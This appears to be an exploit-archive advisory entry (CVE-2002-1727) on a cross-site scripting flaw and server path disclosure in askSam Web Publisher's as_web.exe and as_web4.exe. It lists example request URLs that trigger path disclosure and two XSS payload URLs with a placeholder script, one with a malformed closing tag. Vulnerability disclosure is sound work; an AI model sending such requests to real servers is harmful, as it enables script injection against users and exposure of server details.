askSam 4.0 Web Publisher - Cross-Site Scripting

Author: frog
type: webapps
platform: cgi
port: 
date_added: 2002-05-05  
date_updated: 2012-09-21  
verified: 1  
codes: CVE-2002-1727;OSVDB-27074  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 21435.txt  
source: https://www.securityfocus.com/bid/4670/info

askSam is a database system. An optional component, askSam Web Publisher (versions 1 and 4), is reportedly vulnerable to cross site scripting vulnerability in the as_web.exe (or as_web4.exe) component. This is due to a failure to strip script and HTML when returning error messages that include user input.

The same component can also disclose paths on the server when non-existant files are requested.

http://somewhere/as_web.exe?Command=search&file=non-existant-file&request=&MaxHits=10&NumLines=1
http://somewhere/as_web.exe?non-existant
http://somewhere/as_web4.exe?Command=First&File=non-existant-file

These examples demonstrate the cross site scripting issue:
/as_web4.exe?existant-ask-file!!.ask+B+<script>ANYSCRIPT</script>
/as_web.exe?existant-ask-file!!.ask+B+<script>ANYSCRIPT<script>